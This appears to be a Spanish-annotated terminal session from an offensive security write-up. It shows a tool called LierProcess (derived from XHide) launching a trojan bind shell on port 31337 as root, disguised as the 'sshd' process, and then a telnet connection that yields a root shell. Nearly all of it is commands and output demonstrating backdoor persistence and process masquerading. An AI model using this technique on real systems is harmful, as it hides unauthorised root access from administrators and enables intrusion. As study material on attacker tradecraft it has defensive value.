/*** INTENTAMOS CONECTAR AL PUERTO 31337 Y NOS RECHAZA LA CONEXION, O SEA, NO HAY NINGUN PROGRAMA ATENTIENDO EL PUERTO (backdoor) ***/ nitrous@lsd:~/research/hidereverse$ telnet localhost 31337 Trying 127.0.0.1... telnet: Unable to connect to remote host: Connection refused nitrous@lsd:~/research/hidereverse$ su Password: root@lsd:/home/nitrous/research/hidereverse# ps aux | grep sshd /*** NO HAY NINGUN PROCESO LLAMADO sshd ***/ root 8334 0.0 0.7 3408 804 pts/5 S+ 11:49 0:00 grep sshd /*** LANZAMOS EL TROYANO (escucha en el puerto 31337) Y LE DECIMOS QUE CORRA CON EL NOMBRE FALSO: 'sshd' Y COMO EL USUARIO ROOT (uid = 0) Y A LA VEZ QUE SE PONGA COMO DEMONIO (background). ***/ root@lsd:/home/nitrous/research/hidereverse# ./lierprocess -s sshd -u root -d ./bind31337 ############################################################### LierProcess - By nITROUs Coded with reverse engineering from: XHide - Process Faker, by Schizoprenic Xnuxer Research (c) 2002 ############################################################### ############################################################### ==> Fakename: sshd PID: 8336 ############################################################### root@lsd:/home/nitrous/research/hidereverse# ps aux | grep sshd /*** AHORA VEMOS EL PROCESO 8336 CORRIENDO ***/ root 8336 0.0 0.2 1404 252 pts/5 S 11:49 0:00 sshd root 8338 0.0 0.7 3412 800 pts/5 S+ 11:49 0:00 grep sshd root@lsd:/home/nitrous/research/hidereverse#exit /*** AHORA CONECTAMOS Y NOS DA SHELL, YA QUE EL TROYANO ESTA CORRIENDO ***/ nitrous@lsd:~/research/hidereverse$ telnet localhost 31337 Trying 127.0.0.1... Connected to localhost.localdomain. Escape character is '^]'. id; uid=0(root) gid=0(root) groups=0(root) : command not found exit; Connection closed by foreign host.